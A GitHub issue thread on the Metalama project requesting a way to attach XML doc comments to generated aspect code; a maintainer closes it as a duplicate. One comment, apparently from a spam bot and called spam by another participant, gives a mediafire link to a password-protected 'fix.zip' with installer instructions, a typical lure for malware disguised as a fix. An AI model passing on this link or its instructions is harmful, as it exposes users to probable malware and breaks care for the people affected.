### ISSUE TITLE
Feature request: Introduce XML doc (///) comments on generated code

### ISSUE THREAD

**Issue by niklasstich** [postsharp/Metalama#357] opened 2024-08-26 15:29 UTC
For various reasons, we might have to give users documentation on our generated aspect code sometimes, especially when said code is intended to be called from user code. This might be usage instructions, explanations of parameters, documentation of all possible exceptions or other remarks, and it is not sufficient to simply document all this information on the aspect attribute itself. For that reason, it should be a feature to introduce [XML doc](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/xmldoc/) above IDeclarations (types, interfaces, methods, properties, fields) that we introduced programmatically via `builder` or `builder.Advice`.

It would probably be easiest to just take in a string and put it verbatim on the declaration instead of having some sort of "XmlDocBuilder" that implements all the various XML doc tags.

**Comment by Lxx-c** [comment] 2024-08-26 15:29
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by niklasstich** [comment] 2024-08-26 15:33
I see the spam bots have finally arrived on GitHub too...

**Comment by gfraiteur** [comment] 2024-09-03 10:56
This is a duplicate of #113.

**Closed by gfraiteur** 2024-09-03 10:56 UTC
Labels: enhancement
